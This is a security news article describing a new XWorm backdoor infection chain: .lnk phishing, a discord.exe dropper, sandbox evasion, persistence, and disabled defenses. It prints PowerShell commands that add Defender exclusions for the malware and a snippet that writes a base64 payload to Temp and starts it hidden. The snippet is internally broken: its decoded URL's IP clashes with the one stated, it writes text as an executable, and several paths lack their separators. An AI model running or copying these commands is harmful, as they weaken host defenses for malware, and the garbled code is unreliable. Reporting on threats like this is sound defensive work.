XWorm Malware With New Infection Chain Evade Detection Exploiting User and System Trust

Emerging quietly in mid-2025, the XWorm backdoor has evolved into a deceptively sophisticated threat that preys on both user confidence and system conventions.

Initial reports surfaced when organizations noted a sudden uptick in obscure .lnk-based phishing emails masquerading as benign documents.

Security teams quickly observed that these shortcuts triggered hidden PowerShell routines rather than opening any expected files, suggesting the emergence of a new infection chain.

Within days, enterprises across multiple sectors reported anomalous network connections to unfamiliar IP addresses, hinting at an active Command and Control (C2) infrastructure.

As the campaign gained momentum, Trellix analysts identified a notable departure from XWorm’s earlier, more predictable methods.

Gone were the simplistic batch scripts and obvious VBScript payloads; instead, the attackers now deploy a multi-stage mechanism that leverages both social engineering and technical subterfuge.

The initial .lnk file, often delivered via targeted spear-phishing, drops a benign-looking text artifact before silently fetching “discord.exe” from a remote host.

Upon execution, this .NET-based executable unpacks and launches two additional components—main.exe and system32.exe—with the latter serving as the core XWorm payload.

Once system32.exe takes hold, it performs rigorous environment checks, aborting if it detects a sandbox or virtual machine.

If the host is deemed genuine, the malware duplicates itself as Xclient.exe and establishes persistence by creating both a scheduled task and a registry Run key.

System defenses are methodically dismantled: Windows Firewall policies are disabled via modifications to HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsFirewallDisableFirewall, while PowerShell execution policies are bypassed to white-list the malicious processes.

ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:Tempdiscord.exe"
ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess "Xclient.exe"

These commands ensure XWorm operates under minimal scrutiny, allowing unfettered access to the compromised environment.

Infection Mechanism and Deployment

The heart of XWorm’s new chain lies in its ingenious use of base64 encoding combined with Rijndael decryption, allowing the payload to remain concealed until execution.

The initial .lnk file embeds a base64 string that decodes into a one-line PowerShell command.

This command retrieves “discord.exe” from hxxp://85[.]203[.]4[.]232:5000/Discord.exe, saving it to the Temp directory before launching it stealthily.

$payload = "ZG93bmxvYWQgZnJvbSAgaHR0cDovLzg1LjIwMy4zLjIzMjo1MDAwL0Rpc2NvcmQuZXhl"
[IO.File]::WriteAllBytes("$env:TEMPdiscord.exe", [Convert]::FromBase64String($payload))
Start-Process "$env:TEMPdiscord.exe" -WindowStyle Hidden

After activation, discord.exe drops main.exe and system32.exe, each packed with advanced obfuscation techniques to thwart static analysis.

Main.exe’s resource section harbors embedded Python modules, while system32.exe implements early TLS callbacks to execute critical code before any security hooks can intervene.

This layered approach not only complicates detection but ensures that each component reinforces the next, yielding a resilient, stealth-focused infection chain that challenges conventional defense strategies.

Through this evolution, XWorm demonstrates how blending social engineering, multi-stage payload delivery, and sophisticated cryptographic concealment can enable adversaries to outpace existing detection technologies, maintaining both stealth and persistence within targeted networks.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.